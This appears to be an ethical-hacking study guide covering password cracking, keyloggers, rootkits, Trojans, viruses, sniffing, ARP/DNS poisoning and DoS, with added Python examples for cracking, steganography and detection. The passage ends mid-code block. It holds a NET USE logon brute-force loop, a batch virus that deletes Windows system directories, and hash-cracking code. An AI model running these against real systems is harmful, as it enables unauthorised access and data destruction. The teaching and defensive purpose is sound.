70
Password attacks fall into four classes:
Passive online: sniffing the wire for credentials: packet sniffing, man-in-the-middle and replay attacks.
Active online: guessing the password directly against the login, typically the Administrator account.
Offline: cracking captured hashes with dictionary, hybrid and brute-force attacks.
Non-electronic: shoulder surfing, social engineering, dumpster diving.
Passive Online
In a passive online attack the attacker sniffs the authentication exchange and cracks the captured challenge/response offline. Hashing does not prevent this: the captured hash or response can be replayed or cracked, and sniffer toolkits automate both the capture and the cracking.
71
Active Online
An active online attack guesses passwords against the live login. Windows accepts logons through the NET USE command against the IPC$ share, and the attempt can be scripted from the Windows shell:
1. In Notepad, write a file with one password and the user name it belongs to per line (in that order, to match the FOR variables below); a dictionary generator can produce it. Save it on drive C: as credentials.txt.
2. Use FOR to read the file and feed each pair to NET USE:
C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\targetIP\IPC$ %i /u:%j
3. A successful guess maps the share; watch for the first success.
Guessing is slow, noisy and triggers account lockout where the policy sets one, which is why attackers prefer offline cracking.
73
Offline attacks
The attacker obtains the hashes (from the SAM or by sniffing) and cracks them on a machine of his own, with no lockout and no logging on the target. Three techniques, with an example of a password each can recover:
Dictionary attack       Administrator
Hybrid attack           Adm1n1strator
Brute-force attack      Ms!tr245@F5a
A dictionary attack hashes each word of a word list and compares; it is fast but finds only dictionary words. A hybrid attack applies rules to the dictionary words, appending digits or substituting characters such as 1 for i, and so catches passwords like Adm1n1strator. A brute-force attack tries every combination of the character set up to a given length; it always succeeds eventually, but the time grows exponentially with length and character set, from minutes for short passwords to years for long mixed ones.
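The three techniques in the table above, as an added example (not from the original text). A real cracker works against LM/NT hashes; here an unsalted SHA-256 stands in so that the block runs with the standard library only. The word list and target passwords are constructed, and the hybrid rules (case changes, leet substitutions, numeric suffixes) are an assumption about what a typical rule set does.

```python
"""Dictionary, hybrid and brute-force guessing against a password hash.

Added example (not from the original document). SHA-256 is a stand-in for
the LM/NT hash; the word list and targets are constructed. It reproduces the
text's table: "Administrator" falls to the dictionary, "Adm1n1strator" needs
the hybrid rules, a short random password needs exhaustive search.
"""
import hashlib
import itertools

ALPHANUM = "abcdefghijklmnopqrstuvwxyz0123456789"
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}


def h(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def hybrid_variants(word: str):
    """Hybrid rules: the word as-is, case variants, leet substitutions and
    numeric/symbol suffixes. Yields each candidate once."""
    bases = {word, word.lower(), word.capitalize(), word.upper()}
    for base in list(bases):
        bases.add("".join(LEET.get(c.lower(), c) for c in base))  # full leet
        bases.add(base.replace("i", "1"))                          # Adm1n1strator
    seen = set()
    for base in bases:
        for suffix in ["", "1", "123", "!", "2007"]:
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def dictionary_attack(target: str, words):
    for w in words:
        if h(w) == target:
            return w
    return None


def hybrid_attack(target: str, words):
    for w in words:
        for cand in hybrid_variants(w):
            if h(cand) == target:
                return cand
    return None


def brute_force(target: str, alphabet: str, max_len: int):
    """Exhaustive search; cost is len(alphabet)**max_len, which is why the
    text recommends long passwords from a large character set."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            cand = "".join(tup)
            if h(cand) == target:
                return cand
    return None
```

Against real LM hashes the same loop runs per 7-character half and with an upper-cased alphabet, which is why LM cracking is so much faster than the numbers above suggest.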
74
Pre-Computed Hashes
Pre-computed hash tables (rainbow tables) store the hashes of huge password sets in advance, so cracking becomes a lookup. Salting defeats them; LM and NT hashes are unsalted.
Nonelectronic
Non-electronic attacks need no computer: shoulder surfing (watching the user type), social engineering (asking the help desk or the user), and dumpster diving (searching waste for written passwords). Shoulder surfing works wherever passwords are typed in public; privacy screens and awareness are the countermeasures.
75
Default password lists:
http://www.defaultpassword.com
http://www.cirt.net/passwords
http://www.virus.org/default-password
Abcom PDF Password Cracker removes or recovers the passwords of PDF files.
Keyloggers and spyware
A keystroke logger (keylogger) records everything typed, including passwords, either as software or as a hardware device plugged in between the keyboard and the computer; hardware loggers are invisible to the operating system. Keyloggers are a standard payload once the attacker has access.
Spector (spyware) records screenshots and activity; Anti-Spector detects it.
eBlaster reports e-mails, chats and keystrokes to a remote address.
SpyAnywhere gives remote control and shows the browsing history.
Fearless Key Logger logs keystrokes to a file.
E-mail Keylogger sends the log by e-mail.
Other keyloggers:
Revealer Keylogger
Handy Key Logger
Ardamax Keylogger
Powered Keylogger
ELITE Keylogger
Quick Keylogger
Spy-Keylogger
Perfect Keylogger
Invisible Keylogger
Actual Spy
Spytector FTP Keylogger
IKS Software Keylogger
Ghost Keylogger
Countermeasures: anti-spyware software, inspecting the keyboard cable for hardware devices, and on-screen keyboards for sensitive input.
77
Privilege escalation
Once in with an ordinary account, the attacker raises it to administrator.
GetAdmin.exe adds a user to the local Administrators group on Windows NT 4.0; the flaw was fixed in SP3, so it works only on unpatched NT.
HK.exe exploits an NT kernel flaw to grant administrator rights.
Active@ Password Changer resets the local administrator password from boot media.
x.exe creates an account named X with administrator rights when run.
With administrator rights the attacker can install back doors and keystroke loggers, so escalation is followed by planting tools.
Executing applications remotely: PsExec runs programs on remote systems. Remoxec runs commands remotely through RPC (DCOM) and the Task Scheduler. Alchemy Remote Executor runs programs on many remote machines at once. Emsa FlexInfo Pro reports CPU usage and other system details.
Buffer Overflows
A buffer overflow exploits a program that writes more data into a buffer than it holds, so that the attacker's code runs with the program's privileges, typically returning a cmd shell.
Rootkit
A rootkit is a set of programs that hides the attacker's presence and provides backdoor access. It replaces or hooks system components so that the attacker's files, processes and connections are invisible. Rootkit types:
Kernel-level rootkits: replace or patch parts of the kernel, usually as loadable modules or drivers, and include a backdoor; they are the hardest to detect since they control what the operating system reports.
Library-level rootkits: replace system libraries so that calls made through them return falsified results.
Application-level rootkits: replace or patch individual application binaries (a trojaned ls or netstat).
Rootkit for Windows 2000/XP: the Windows NT/2000 rootkit is a kernel-mode device driver, _root_.sys, installed by DEPLOY.EXE. It hides files, processes and registry keys whose names begin with _root_; a crash in the driver blue-screens the system. It is controlled with net stop _root_ and net start _root_; stopping and restarting the service reloads the driver.
80
Rootkit countermeasures
Once a rootkit is installed it controls what the system reports, so tools run on the infected host, even as administrator, cannot be trusted; boot from clean media and compare. MD5 checksums: a 128-bit MD5 checksum of each system file, taken before deployment and compared later, reveals modified files. Tripwire automates this: it stores checksums of critical files and reports any change. After a rootkit is found, rebuilding from trusted media is the only safe remedy.
Hiding files: attackers hide their tools with the attrib command:
attrib +h [file/directory]
NTFS alternate data streams hide data behind an existing file name.
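A Tripwire-style baseline as an added example (not from the original text and not Tripwire's own code). It hashes a temporary directory tree built inline, then simulates a rootkit replacing a binary and dropping a hidden file, and reports the difference. SHA-256 replaces the MD5 of the text because MD5 collisions are practical today; the workflow (baseline before exposure, compare afterwards, keep the baseline off the host) is the same.

```python
"""Integrity baseline: hash every file, keep the baseline, report changes.

Added example (not from the original document). Works on a temporary tree
built inline so it runs offline.
"""
import hashlib
import os
import tempfile


def file_digest(path: str) -> str:
    d = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            d.update(chunk)
    return d.hexdigest()


def baseline(root: str) -> dict:
    """Relative path -> (digest, size, mode). The mode catches attrib-style
    hiding and permission changes that leave the contents intact."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            out[os.path.relpath(full, root)] = (file_digest(full), st.st_size, st.st_mode)
    return out


def compare(old: dict, new: dict) -> dict:
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo() -> dict:
    """Build a tree, baseline it, simulate a rootkit (trojaned binary plus a
    hidden dropped file), then diff against the baseline."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"original ls")
    with open(os.path.join(root, "hosts"), "wb") as f:
        f.write(b"127.0.0.1 localhost\n")
    before = baseline(root)
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"trojaned ls")            # same name and size, new contents
    with open(os.path.join(root, ".hidden"), "wb") as f:
        f.write(b"backdoor")
    return compare(before, baseline(root))
```

The check is only as good as the environment it runs in: a kernel-level rootkit can feed the original bytes to any reader on the infected host, which is why the comparison should be run from clean boot media.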
NTFS Streams
A FAT file has a single data stream; NTFS files can carry several named streams, so data stored in a stream such as file.txt:hidden.exe does not appear in directory listings or file sizes. LNS.exe lists NTFS streams and finds data hidden this way.
82
Steganography
Steganography hides data inside other data (an image, audio or text) so that the existence of the message is concealed; the carrier looks normal, and a sniffer or casual inspection sees only a picture.
ImageHide hides text in images.
Blindside hides files in BMP images.
MP3Stego hides data in the MP3 bit stream.
Snow hides messages in the whitespace at the end of ASCII text lines; the added spaces and tabs are invisible in viewers.
Camera/Shy is an Internet Explorer add-on that hides data in GIF images.
Masker hides files in image, audio and video carriers.
Other steganography tools: wbStego, Gifshuffle, Pretty Good Envelope, Steganos, Steghide, S-Tools, Blindside, Fort Knox, Video Steganography, FoxHole, Stegomagic, StegaNote, Cloak, Hydan, Data Stash, OutGuess.
Detection: Stegdetect finds steganographic content in JPEG images. Dskprobe (on the Windows 2000 CD) examines raw disk sectors where data may be hidden.
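An added example (not from the original text, and not the code of any tool it names) of the technique behind BMP-based tools such as Blindside and S-Tools: least-significant-bit embedding, with a length header so the receiver knows where the message ends, and a crude statistical detector of the kind Stegdetect-style tools build on. The cover is a constructed list of 8-bit samples standing in for pixel bytes.

```python
"""LSB steganography in a byte 'image', with a length header and a detector.

Added example (not from the original document). One payload bit is written
into the low bit of each cover byte, the bit the eye cannot see.
"""


def embed(cover: bytes, payload: bytes) -> bytes:
    """Write a 32-bit length then the payload, one bit per cover byte."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(b >> (7 - i)) & 1 for b in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small: need %d samples" % len(bits))
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    bits = [b & 1 for b in stego]

    def take(n_bytes: int, offset: int) -> bytes:
        chunk = bits[offset:offset + 8 * n_bytes]
        return bytes(int("".join(map(str, chunk[i:i + 8])), 2)
                     for i in range(0, len(chunk), 8))

    length = int.from_bytes(take(4, 0), "big")
    return take(length, 32)


def lsb_bias(samples: bytes, window: int = 256) -> float:
    """Detector heuristic: in natural images the values 2k and 2k+1 occur with
    similar but not identical frequency; LSB embedding pushes every such pair
    toward equality. Returns the mean absolute difference between pair counts
    over the first `window` bytes; lower is more suspicious."""
    counts = [0] * 256
    for b in samples[:window]:
        counts[b] += 1
    return sum(abs(counts[2 * k] - counts[2 * k + 1]) for k in range(128)) / 128
```

Real detectors compare against the statistics expected for the image format rather than a fixed threshold, and embedding in compressed formats (JPEG, MP3) works on transform coefficients instead of raw samples, but the LSB idea is the same.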
84
Auditing and covering tracks
Windows auditing writes security events to the Event Log, viewed in Event Viewer. AuditPol turns auditing on or off from the command line, so the attacker disables it on arrival and re-enables it on leaving. Clearing the Event Log removes evidence but also leaves an "audit log cleared" event, which administrators should treat as an alarm.
Elsave.exe clears event logs, including on remote systems.
WinZapper deletes selected entries from the Windows 2000 security log rather than the whole log.
Evidence Eliminator removes traces from the whole system: system files, Internet cache, Recycle Bin, temp folders and more.
Other track-covering tools:
Traceless
Tracks Eraser Pro
Aromor
ZeroTracks
PhatBooster
86
Trojans and backdoors
A Trojan is a program that looks useful but carries a hidden malicious function; a backdoor is a hidden way into a system that bypasses normal authentication. Backdoors are planted by worms or by the attacker after a break-in, and give repeated access without exploiting the system again. A backdoor typically runs as a service, listens on a port, and may hide itself from the process list and the logs.
A RAT (remote access Trojan) is a backdoor with a client/server model: the server runs on the victim, the attacker's client connects to it and can capture keystrokes and screens, transfer files, run programs and use the host in DDoS attacks. Some RATs take their commands over IRC. Trojans are also the usual carrier for spyware.
Well-known Trojans and the ports they use:
Trojan             Protocol   Port
BackOrifice        UDP        31337 or 31338
Deep Throat        UDP        2140 or 3150
NetBus             TCP        12345 and 12346
Whack-a-mole       TCP        12361 and 12362
NetBus 2           TCP        20034
GirlFriend         TCP        21544
Masters Paradise   TCP        3129, 40421, 40422, 40423, and 40426
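As an added example (not from the original text), the port table above turned into a check over netstat output. The port table is the one printed above; the netstat lines are constructed samples in the format of netstat -an on Windows. A hit is only a lead: any service can be bound to these ports, so the next step is identifying the process, not a verdict.

```python
"""Match listening sockets against the well-known Trojan port table.

Added example (not from the original document). The netstat text below is a
constructed sample.
"""
import re

TROJAN_PORTS = {
    ("udp", 31337): "BackOrifice", ("udp", 31338): "BackOrifice",
    ("udp", 2140): "Deep Throat", ("udp", 3150): "Deep Throat",
    ("tcp", 12345): "NetBus", ("tcp", 12346): "NetBus",
    ("tcp", 12361): "Whack-a-mole", ("tcp", 12362): "Whack-a-mole",
    ("tcp", 20034): "NetBus 2",
    ("tcp", 21544): "GirlFriend",
    **{("tcp", p): "Masters Paradise" for p in (3129, 40421, 40422, 40423, 40426)},
}

LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s*(LISTENING|\*:\*)?", re.I)


def parse_netstat(text: str):
    """Yield (proto, local_port, state) for each socket line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        yield m.group(1).lower(), int(m.group(3)), (m.group(5) or "").upper()


def suspicious_ports(text: str) -> list:
    hits = []
    for proto, port, state in parse_netstat(text):
        # UDP has no LISTENING state; a bound UDP socket just shows *:*
        if proto == "tcp" and state != "LISTENING":
            continue
        name = TROJAN_PORTS.get((proto, port))
        if name:
            hits.append((proto, port, name))
    return hits


SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:12346     192.168.1.77:3411      ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:137            *:*
"""
```

Modern Trojans pick random or well-known ports (80, 443), so a port list catches only the classics; the process-to-port mapping from fport or CurrPorts, mentioned later in this document, is the more durable check.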
Overt and covert channels
An overt channel is a legitimate communication path, such as HTTP on port 80 or telnet; a covert channel carries data in a way not intended for communication, so that it passes unnoticed. Loki is a backdoor that tunnels a shell inside ICMP echo packets, which most networks allow, so its command traffic looks like ping.
91
Types of Trojans:
Data-sending Trojans: send captured data (passwords, keystrokes) to the attacker.
Destructive Trojans: delete or corrupt files.
Proxy Trojans: turn the victim into a proxy for the attacker's traffic.
Reverse-connecting Trojans: the victim connects out to the attacker, through the firewall, instead of listening for a connection. The Reverse WWW Shell polls the attacker every 60 seconds over HTTP, so its traffic looks like web browsing.
92
93
NetBus stores its listening port in HKEY_CURRENT_USER\NetBus Server\General\TCPPort and starts from:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
BackOrifice 2000 is a remote-administration Trojan over TCP/IP. It also starts from:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
and is extended by plug-ins: remote desktop, 3DES encryption of its traffic, transport over UDP or ICMP, and more.
ComputerSpy Key Logger records keystrokes and chats in AIM, AOL, MSN, ICQ and Yahoo Messenger, and webmail.
Beast injects itself into winlogon.exe, Windows Explorer or Internet Explorer, so no extra process appears; it is an all-in-one Trojan.
CyberSpy Telnet Trojan opens a telnet backdoor.
SubRoot is a remote administration Trojan listening on port 1700.
LetMeRule is a remote backdoor with a command (cmd) shell.
Firekiller 2000 disables firewalls and antivirus software such as ATGuard.
Hard Drive Killer Pro wipes the hard disk from DOS.
Other Trojans: Satellite-Turkojan, DownTroj, Biorante RAT, T2W, Backdoor.Theef, HackerzRat, SharK, Rapid Hacker, Poison Ivy, Trojan.Hav-Rat, DarkLabel B4, Yakoza RAT, AccRat, OD Client, ProAgent, Optix PRO, VicSpy, Criminal Rat Beta, 1337 Fun Trojan, TYO, VNC Trojan, TinyFTPD, ZombieRat, ConsoleDevil, SINner, RubyRAT Public, Mhacker-PS, DaCryptic, Dark Girl, ProRat, Troya, Biohazard RAT, Skiddie Rat, DJI RAT, Webcam Trojan, Hovdy.a, PokerStealer.A, Net-Devil.
Netcat
Netcat reads and writes TCP and UDP connections from the command line. It can listen on a port and hand the connection a shell, which makes it a universal backdoor, and it connects to any port like telnet.
How Trojans get in: CD-ROMs, e-mail attachments, screen savers, "background" images and other downloads, instant messaging and file sharing.
Signs of infection: the CD tray opens by itself, the screen flips or the background changes, programs start from the Start menu on their own, the ISP complains of scanning from the machine's IP address, the taskbar disappears, Ctrl+Alt+Del stops working.
Wrapping
A wrapper binds the Trojan to a legitimate program so that running the innocent program installs the Trojan silently; the user sees only the expected application.
96
Graffiti is a wrapper (joiner) tool.
RemoteByMail controls the machine through commands sent by e-mail.
Antivirus evasion: packing or encrypting a Trojan changes its signature, and construction kits generate new variants: Trojan Horse Construction Kit, Senna Spy Generator, Progenic Mail Trojan Construction Kit v2.0, Pandora's Box.
97
Detecting Trojans, backdoors and spyware: inspect listening ports, startup entries and running processes, and compare them with a clean baseline. Ethereal shows the Trojan's traffic on the wire. Trojan scanners look for known signatures. Tripwire detects modified system files by comparing hashes against its baseline.
Useful tools: HijackThis, Autoruns, What's Running, Super System Helper, CurrPorts, Startup List.
Windows File Protection (WFP, in Windows 2000, XP and 2003) restores protected EXE, SYS, DLL, OCX and TTF files that are replaced by untrusted versions.
sigverif checks that system files are digitally signed:
1. Click Start.
2. Click Run.
3. Type sigverif and click Start; unsigned files are listed.
System File Checker verifies the protected files against the cache in Windows\system32\dllcache and overwrites modified copies:
sfc /scannow
Anti-Trojan products: XoftSpySE, Comodo BOClean, TrojanHunter, SPYWAREfighter, Spyware Doctor.
100
Viruses and worms
A virus attaches itself to a host file or boot sector and spreads when that host is executed or copied; a worm is self-contained and spreads over the network on its own, often leaving a backdoor behind. Both are malware. A virus's life has an infection phase, in which it attaches to files and replicates, and an attack phase, in which it delivers its payload. Infection methods for EXE files: appending to the file, overwriting it, or spreading in fragments through it. Worms have propagated through Internet Explorer and e-mail clients without any user action.
Virus types by target: program files (EXE), DLL and INI files, batch files (BAT), source code, macros, boot sectors.
Virus types by technique:
Polymorphic: changes its own code on each infection to defeat signatures.
Stealth: intercepts system calls to hide its presence and the changes it made.
Sparse infector: infects only occasionally to avoid notice.
Armored: resists disassembly and debugging.
Cavity: stores itself in the empty space inside a host file, leaving the size unchanged.
Tunneling: gets beneath antivirus interrupt handlers.
Companion: a file with the same name as a program but an extension that runs first; notepad.com runs instead of notepad.exe.
Camouflage: disguises itself as a benign program.
Bootable CD-ROM: infects from a CD-ROM that boots before the hard disk.
105
A batch-file virus, Game.bat:
@echo off
del c:\winnt\system32\*.*
del c:\winnt\*.*
Converted to Game.com with bat2com and run, it deletes the contents of the WINNT directory. Virus construction kits produce such things automatically:
Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00
106
Antivirus detection relies on checksums of known-good files and on virus signatures. Manual checks for an infection:
1. Look for unexpected processes and files.
2. Examine open ports and loaded modules with netstat.exe, fport.exe, listdlls.exe, handle.exe and pslist.exe.
3. Compare the findings with a clean system.
4. Scan with an up-to-date antivirus.
The EICAR test file checks that the antivirus is working: save the following line in Notepad as EICAR.COM; a working scanner detects it as a virus:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
107
Sniffer
A sniffer captures packets from the network for analysis. Administrators use sniffers to troubleshoot; attackers use them to read passwords and data. A network card normally passes up only frames addressed to its own MAC address (and broadcasts); in promiscuous mode it passes every frame it sees, which is what a sniffer needs. On a hub every host sees all traffic, so a sniffer works passively; on a switch it sees only its own traffic, hence the active techniques below. Protocols that send credentials in clear, and so are sniffer targets: HTTP, SNMP, POP3, FTP, telnet, IMAP, SMTP, NNTP.
109
Ethereal is the best-known sniffer; Wireshark is its successor. It captures on any interface and decodes hundreds of protocols.
Snort is a sniffer and intrusion detection system (IDS): its rules detect buffer overflow attempts, Server Message Block (SMB) probes, CGI attacks and OS fingerprinting.
WinDump is the Windows port of tcpdump, a command-line sniffer with a rule-based filter language.
EtherPeek and OmniPeek are commercial analysers.
WinSniffer extracts passwords from IMAP, telnet, SMTP, ICQ, HTTP, POP3, FTP and NNTP traffic.
Iris decodes and reconstructs sessions from captured traffic.
Other sniffers: Wiretap Pilot, Look@LAN, The Dude Sniffer.
Passive sniffing works on a hub, where all traffic reaches every port. Active sniffing is needed on a switch and uses ARP spoofing or traffic flooding to get other hosts' traffic to the sniffer.
110
A switch keeps a MAC table mapping each MAC address to a port and forwards each frame only to the port of its destination, so a passive packet sniffer on a switched network sees only broadcasts and its own traffic.
111
ARP Poisoning
ARP maps IP addresses to MAC addresses; TCP/IP on a LAN needs the MAC address to deliver a frame. A host wanting to send to an IP address broadcasts an ARP request ("who has this IP?"); the owner replies with its MAC address, and the sender caches it. ARP has no authentication: any host can send a reply, even an unsolicited one, claiming any IP address, and the other hosts update their caches. ARP poisoning (ARP spoofing) uses this to redirect traffic on a switched network: the attacker tells the victim that the gateway's IP address belongs to the attacker's MAC, tells the gateway the same about the victim, and forwards packets between them, a man-in-the-middle that can sniff or modify everything. If the attacker does not forward, the result is a DoS.
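An added example (not from the original text) of the arpwatch-style detection that catches the attack just described. It takes the (IP, MAC) pairs seen in ARP replies (constructed samples below, standing in for what a sniffer would capture) and flags the two signs of poisoning: an IP whose MAC changes, and one MAC claiming several IP addresses at once, typically the gateway plus the victims.

```python
"""Detect ARP cache poisoning from observed ARP replies.

Added example (not from the original document). The reply list is a
constructed capture: legitimate replies, then an attacker claiming both the
gateway's and the victim's IP address.
"""
from collections import defaultdict


class ArpMonitor:
    def __init__(self, gateway_ip: str):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}                  # last MAC seen for each IP
        self.mac_to_ips = defaultdict(set)   # every IP a MAC has claimed

    def observe(self, ip: str, mac: str) -> list:
        """Record one ARP reply and return the alerts it raises."""
        mac = mac.lower()
        alerts = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append("flip-flop: %s moved from %s to %s" % (ip, old, mac))
            if ip == self.gateway_ip:
                alerts.append("gateway %s is now answered by %s" % (ip, mac))
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            alerts.append("%s claims %s" % (mac, ",".join(sorted(self.mac_to_ips[mac]))))
        return alerts


def replay(gateway_ip: str, replies) -> list:
    mon = ArpMonitor(gateway_ip)
    out = []
    for ip, mac in replies:
        out.extend(mon.observe(ip, mac))
    return out


# Constructed capture. The attacker (00:0c:29:aa:bb:cc) tells the victim it is
# the gateway and tells the gateway it is the victim.
SAMPLE_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01"),   # real gateway
    ("10.0.0.5", "00:11:22:33:44:05"),   # victim
    ("10.0.0.9", "00:0c:29:aa:bb:cc"),   # attacker's own address
    ("10.0.0.1", "00:0c:29:aa:bb:cc"),   # spoofed: gateway IP -> attacker MAC
    ("10.0.0.5", "00:0c:29:aa:bb:cc"),   # spoofed: victim IP -> attacker MAC
]
```

DHCP renumbering also produces flip-flops, so in practice the gateway and server addresses are pinned (static ARP entries or a list of known MACs) and alerts on those are treated as high priority while the rest are logged.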
112
113
MAC Duplicating
In MAC duplicating the attacker sets the sniffer's MAC address to that of a legitimate host, so the switch sends that host's frames to the attacker's port as well. MAC filtering on switches and access points, which allows only listed addresses, is defeated the same way.
Capturing with Ethereal: start a capture on the interface, apply a filter for the protocol of interest and read the credentials from the packet details.
114
MAC Flooding
The switch's MAC table has a fixed size. The attacker floods the switch with frames from random source MAC addresses until the table is full; many switches then fall back to hub behaviour and send every frame to all ports, so a sniffer sees everything. The two active sniffing methods are therefore ARP spoofing and flooding: ARP spoofing poisons the victims' caches so they send to the sniffer as if it were the gateway; flooding overwhelms the switch itself.
115
DNS Poisoning
DNS poisoning corrupts the mapping between a name and an IP address, so that a user typing a URL is sent to the attacker's host. The attacker answers a resolver's query before the real server does, or inserts a false record into a cache or hosts file; the victim then connects to a fake site that looks like the real one. Worms have used it to redirect victims to malware. Types:
Intranet spoofing: poisoning lookups on the local network (the local DNS server or hosts files).
Internet spoofing: poisoning a resolver's cache for external names, so every client of that resolver is redirected.
EtherFlood floods a switch with random MAC addresses.
Dsniff is a suite of sniffing tools: dsniff itself collects passwords; urlsnarf, msgsnarf, mailsnarf, filesnarf and webspy extract URLs, chat messages, e-mail, files and browsing sessions from traffic. Sshmitm and webmitm run man-in-the-middle attacks against SSH and HTTPS. dnsspoof, arpspoof and macof poison DNS, poison ARP and flood switches respectively, to bring traffic to the sniffer.
Cain & Abel sniffs, poisons ARP, cracks captured hashes by dictionary and brute force, and records VoIP calls.
Packet Crafter builds custom TCP, UDP and IP packets, including the TCP flags.
SMAC changes the MAC address of a Windows adapter.
MAC Changer changes a MAC address on Linux, to a specific, random or vendor-style address.
WinDNSSpoof spoofs DNS replies by guessing the transaction ID; it is combined with ARP spoofing or flooding to see the queries.
Distributed DNS Flooder runs DoS attacks against DNS servers.
119
DNS poisoning is countered by securing the resolvers and by monitoring for unexpected answers.
Other sniffers: SmartSniff, MSN Sniffer, Win Sniffer, Ace Password Sniffer, Effetech, ArpSpyX, Ettercap, AW Cloasoft, EtherLook, NetIntercept, Etherpeek, Snort, EtherApe, Ntop, NetSetMan, SMAC, URL Snooper, BillSniff, Sniphere, NetResident, Sniffem, CommView, Ports Traffic Analyzer, EtherScan Analyzer, Ipgrab, AnalogX Packetmon, EtherDetect Packet Sniffer.
Countermeasures: encryption is the real defence: SSH instead of telnet, SSL, and VPNs with strong ciphers such as AES rather than RC4, so that a packet sniffer captures only ciphertext. Switched networks and static ARP entries limit ARP spoofing.
Detecting a sniffer: a host in promiscuous mode answers differently from a normal one:
Ping method: send an ICMP echo to the suspect's IP address with a wrong destination MAC address; a normal card drops it, a promiscuous one answers.
ARP method: send a non-broadcast ARP request; only a promiscuous host replies.
Latency method: flood the network and watch whether the suspect's response time degrades as it processes every packet.
An IDS can also detect the ARP anomalies that active sniffing causes.
netINTERCEPTOR detects sniffers on the network. Sniffdet runs the TCP/IP tests above against a host. AntiSniff, PromiScan, ARPWatch and ProDetect detect promiscuous-mode hosts and ARP anomalies.
121
Denial of service and session hijacking
A DoS attack makes a service unavailable; session hijacking takes over an existing authenticated connection, often through a man-in-the-middle position.
Denial of Service
A DoS attack overwhelms a target with traffic or requests, or exploits a flaw that crashes it, so that legitimate users are denied service. Attackers use robots (bots), networks of compromised hosts (botnets), smurf amplification and SYN flooding. A DoS attack from one source is plain DoS; from many coordinated sources it is distributed DoS (DDoS). The attack is easy to launch and hard to stop, because the traffic looks like ordinary requests.
Jolt2 sends a stream of fragmented IP packets that locks the target's CPU.
Bubonic sends random TCP packets to crash Windows 2000 hosts.
124
Ping of Death sends an oversized IP packet (a ping larger than the maximum 65,535 bytes, delivered in fragments) that crashes stacks which cannot reassemble it.
SSPing sends a burst of fragmented ICMP packets that freezes the target.
A LAND attack sends a packet whose source IP address and port equal the destination's, so the host loops replying to itself.
CPU Hog is a DoS that starves other processes of CPU time.
WinNuke sends Out of Band (OOB) data to port 139 of a Windows host, causing a buffer overflow and a crash.
Targa is a suite that launches several of these attacks.
RPC Locator exploits the RPC locator service to crash Windows.
DDoS tools:
Trinoo is a UDP-flood DDoS tool: the attacker controls masters, which command agents (daemons) on compromised hosts to flood the victim's IP address; the daemon itself was installed through a buffer overflow. WinTrinoo is the Windows port.
Shaft works like Trinoo, master and agents over UDP, and floods with ICMP, UDP and TCP.
Stacheldraht combines TFN and Trinoo features: UDP flood, ICMP flood and TCP SYN flood, with encrypted telnet-like control of the agents.
126
DDoS
The attacker compromises many hosts (zombies, bots) and directs them to attack at once; spoofed IP addresses make tracing harder. The roles:
Master/handler: the attacker's controller.
Slave/secondary victim/zombie/agent/bot (collectively the botnet): the compromised hosts that generate the traffic.
Victim/primary victim: the target.
The master instructs the slaves; the slaves attack the victim. A DDoS has two phases: the intrusion phase, in which the slaves are compromised and the agent installed, and the attack phase, in which they are commanded to flood the victim.
Bots and botnets
A bot (web robot) is software that performs automated tasks. Spammers use bots to harvest addresses; search engines use them as web crawlers (spiders). A malicious bot is a backdoor agent on a compromised machine that waits for commands, usually over IRC, and can update itself. A botnet is a network of such bots under one controller, used for DDoS, spam relaying over SMTP, click fraud and more; botnets are rented out for DDoS attacks.
smurf
In a smurf attack the attacker sends ICMP echo requests to a network's broadcast address with the victim's address as the spoofed source; every host on that network replies to the victim, amplifying the traffic many times. A plain ping flood is the unamplified version. Smurf has been used to knock users off IRC.
SYN flooding
The attacker sends a stream of TCP SYN packets, usually from spoofed addresses, and never completes the handshake. Each half-open connection occupies a slot in the listen queue until it times out; when the queue is full the server refuses legitimate connections. Defences: SYN cookies (the server encodes the connection state in its initial sequence number instead of storing it), micro blocks (a minimal record per half-open connection), RST cookies, and stack tweaking (shorter timeouts, larger queue).
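An added example (not from the original text) of the SYN cookie defence just named, with both sides of the handshake. The cookie layout is a simplified version of the Linux scheme (a time counter, an encoded MSS and a keyed hash over the connection 4-tuple); the real implementation packs the fields differently. The secret, addresses and ports are constructed.

```python
"""Simplified SYN cookies: surviving a SYN flood without per-connection state.

Added example (not from the original document). The server ISN it builds is:
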